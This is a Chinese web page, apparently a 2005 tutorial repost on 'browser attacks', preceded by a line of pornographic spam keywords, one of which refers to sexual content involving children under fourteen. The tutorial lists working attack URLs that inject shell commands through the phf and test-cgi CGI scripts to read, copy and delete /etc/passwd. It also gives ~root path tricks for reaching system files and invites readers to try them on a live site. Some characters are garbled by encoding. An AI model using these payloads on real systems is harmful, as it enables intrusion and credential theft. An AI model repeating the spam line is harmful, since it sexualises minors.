亚洲av色香蕉一区二区三区,十四以下岁毛片带血a级,亚洲 校园 欧美 国产 另类,亚洲av日韩av一区谷露,色欲av无码一区二区三区

  • 相關(guān)軟件
    >瀏覽器攻擊 創(chuàng)建者:webmaster 更新時(shí)間:2005-05-27 19:32

    在本章我將講述一些利用瀏覽器來(lái)進(jìn)行攻擊的方法
    1。大家都知道了phf攻擊了,phf是cgi script,很多站點(diǎn)都有這個(gè)大漏洞啦,使用
    http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以
    拿到那個(gè)站點(diǎn)的passwd.但還有些更好的執(zhí)行方法呦如:
    http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna


    me=&Qoffice_phone=
    http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
    haqr&Qemail=&Qnickname=&Qoffice_phone=
    http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
    %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
    http://thegnome.com/~someuser/passwd
    http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname


    =haqr&Qemail=&Qnickname=&Qoffice_phone=
    上面執(zhí)行的命令是
    id
    ls -la ~someuser
    cp /etc/passwd ~someuser/passwd
    rm ~someuser/passwd


    2。有關(guān)test攻擊
    http://thegnome.com/cgi-bin/test-cgi?\whatever
    服務(wù)器會(huì)應(yīng)答,本服務(wù)器的一些情況如:
    CGI/1.0 test script report:


    argc is 0. argv is .


    SERVER_SOFTWARE = NCSA/1.4B
    SERVER_NAME = thegnome.com
    GATEWAY_INTERFACE = CGI/1.1
    SERVER_PROTOCOL = HTTP/1.0
    SERVER_PORT = 80
    REQUEST_METHOD = GET
    HTTP_ACCEPT = text/plain, application/x-html, application/html,
    text/html, text/x-html
    PATH_INFO =
    PATH_TRANSLATED =
    SCRIPT_NAME = /cgi-bin/test-cgi
    QUERY_STRING = whatever
    REMOTE_HOST = fifth.column.gov
    REMOTE_ADDR = 200.200.200.200
    REMOTE_USER =
    AUTH_TYPE =
    CONTENT_TYPE =
    CONTENT_LENGTH =


    好吧,讓我們來(lái)點(diǎn)趕興趣的
    http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd


    3。~的應(yīng)用
    ~主要是用在很多的個(gè)人主頁(yè)上的快捷目錄的方法,如果我們使用這樣的~
    http://thegnome.com/~root
    http://thegnome.com/~root/etc/passwd
    不是在任何平臺(tái)上都通過(guò)呦,在BSD Apache上曾經(jīng)成功過(guò),當(dāng)然還可以試試~bin ,~etc,~uucp.....
    看到這個(gè)站點(diǎn)了嗎,本站所在的這個(gè)站點(diǎn)就是用這種形式的,如果我們打入 本站所在的web地址/~bin
    出現(xiàn)了什么,你看到了嗎?然后...............注意請(qǐng)不要破壞
    相關(guān)文章
    本頁(yè)查看次數(shù):